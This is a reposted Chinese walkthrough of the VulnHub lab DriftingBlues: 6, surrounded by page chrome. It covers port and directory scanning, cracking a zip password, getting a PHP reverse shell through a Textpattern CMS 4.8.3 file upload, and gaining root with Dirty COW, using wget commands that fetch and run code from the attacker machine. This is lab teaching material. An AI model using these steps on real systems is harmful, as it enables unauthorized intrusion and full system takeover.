文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

vulnhub DriftingBlues: 6

2023-09-06 08:41

关注

渗透思路:

nmap扫描端口 ---- gobuster扫描网站目录 ---- fcrackzip爆破压缩包密码 ---- 利用TextPattern CMS 4.8.3的RCE(/任意文件上传)漏洞getshell ---- 脏牛提权

环境信息:

靶机:192.168.101.100

攻击机:192.168.101.34

具体步骤:

1、nmap扫描端口

sudo nmap -sV -sC -p- 192.168.101.100

扫描到80端口,并且发现了robots.txt文件

2、gobuster扫描网站目录

浏览器访问http://192.168.101.100/robots.txt

除了发现http://192.168.101.100/textpattern/textpattern/这个登录页面

还发现一句提示

dont forget to add .zip extension to your dir-brute

因此接下来用gobuster扫描网站目录,并加上-x .zip,来扫描.zip后缀的网站文件

gobuster dir -u http://192.168.101.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .zip

扫描到spammer.zip

3、fcrackzip爆破压缩包密码

下载http://192.168.101.100/spammer.zip,解压的时候发现需要密码

用fcrackzip爆破密码

fcrackzip -D -p rockyou.txt spammer.zip -u

得到密码myspace4

解压spammer.zip,密码输入myspace4,得到creds.txt

unzip spammer.zip

查看creds.txt,里面有http://192.168.101.100/textpattern/textpattern/的用户名和密码mayer:lionheart

4、利用TextPattern CMS 4.8.3的RCE(/任意文件上传)漏洞getshell

以用户名mayer,密码lionheart登录http://192.168.101.100/textpattern/textpattern/

登录成功后在左下角发现站点是基于Textpattern CMS v4.8.3搭建的

Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers中搜索Textpattern CMS,发现一个4.8.3版本的RCE:

TextPattern CMS 4.8.3 - Remote Code Execution (Authenticated) - PHP webapps Exploit

把这个exp下载下来之后执行,发现无法执行成功,报错

后来又试了几个exp,都执行失败,寻思可能和这个站点总是出现告警提示有关

最后,根据exploit-db上的exp看出这是个任意文件上传造成的rce,并且文件上传的页面地址是http://192.168.101.100/textpattern/textpattern/index.php?event=file

在该处上传kali上的/usr/share/webshells/php/php-reverse-shell.php,上传前需要修改$ip和$port分别为攻击机ip和攻击机监听的tcp端口。

上传完成后,访问该文件的url为http://192.168.101.100/textpattern/files/上传的文件名

(这边看exp原本我以为url是http://192.168.101.100/textpattern/textpattern/files/上传的文件名,但这个不行,后来试出来是http://192.168.101.100/textpattern/files/上传的文件名)

在攻击机上nc监听8888端口,浏览器访问上传的文件后即可获得靶机www-data用户的反弹shell。

nc -nlvp 8888

再输入如下命令即可得到交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

5、脏牛提权

从攻击机上获取linpeas.sh并执行(攻击机上先执行python2 -m SimpleHTTPServer 80以开启http服务)

wget http://192.168.101.34/linpeas.sh && chmod +x linpeas.sh && ./linpeas.sh

找到内核提权的方法dirty cow,exp下载路径为https://www.exploit-db.com/download/40847

靶机/tmp目录下执行

wget http://192.168.101.34/40847.cpp && g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil && chmod +x dcow && ./dcow

执行成功,获得root用户密码dirtyCowFun

执行su -密码为dirtyCowFun,提权到root,并在/root下找到flag.txt

来源地址:https://blog.csdn.net/elephantxiang/article/details/126682918

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯